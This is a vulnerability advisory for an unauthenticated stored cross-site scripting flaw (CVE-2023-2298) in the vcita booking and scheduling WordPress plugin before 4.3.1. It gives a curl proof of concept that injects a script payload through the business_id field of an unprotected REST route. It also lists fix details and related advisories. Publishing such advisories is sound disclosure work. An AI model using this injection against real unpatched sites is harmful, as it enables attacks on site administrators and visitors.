Online Booking & Scheduling Calendar for WordPress by vcita < 4.3.1 – Unauthenticated Stored Cross-Site Scripting | CVE 2023-2298 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape the business_id parameter of an unprotected REST route endpoint before rendering it back in pages on the website, allowing an unauthenticated attacker to inject arbitrary web scripts, which could target authenticated users such as administrators.

Proof of Concept

curl https://example.com/wp-json/vcita-wordpress/v1/actions/auth \
   –json '{
       "success": true,
       "user_data": {
           "business_id": "\"; alert(1); //",
           "business_name": "Evil Eve",
           "email": "eve@evil.com"
       }
   }'

Affects Plugins

meeting-scheduler-by-vcita

Fixed in 4.3.1

References

CVE

URL

https://blog.jonh.eu/blog/security-vulnerabilities-in-wordpress-plugins-by-vcita

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Jonas Höbenreich

Verified

No

WPVDB ID

1d5cda6c-f054-4571-98af-1ecd51ab0d03

Timeline

Publicly Published

2023-06-02 (about 2 years ago)

Added

2023-06-03 (about 2 years ago)

Last Updated

2023-06-26 (about 2 years ago)

Other

Published

Title

Published

2025-01-07

Title

Metadata SEO <= 2.3 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-02-11

Title

Marketing Automation < 1.2.6.9 - Reflected Cross-Site Scripting

Published

2021-12-03

Title

Modern Events Calendar Lite < 6.2.0 - Subscriber+ Category Add Leading to Stored XSS

Published

2014-10-15

Title

Cforms < 10.2 - XSS

Published

2023-04-17

Title

Sloth Logo Customizer <= 2.0.2 - Stored XSS via CSRF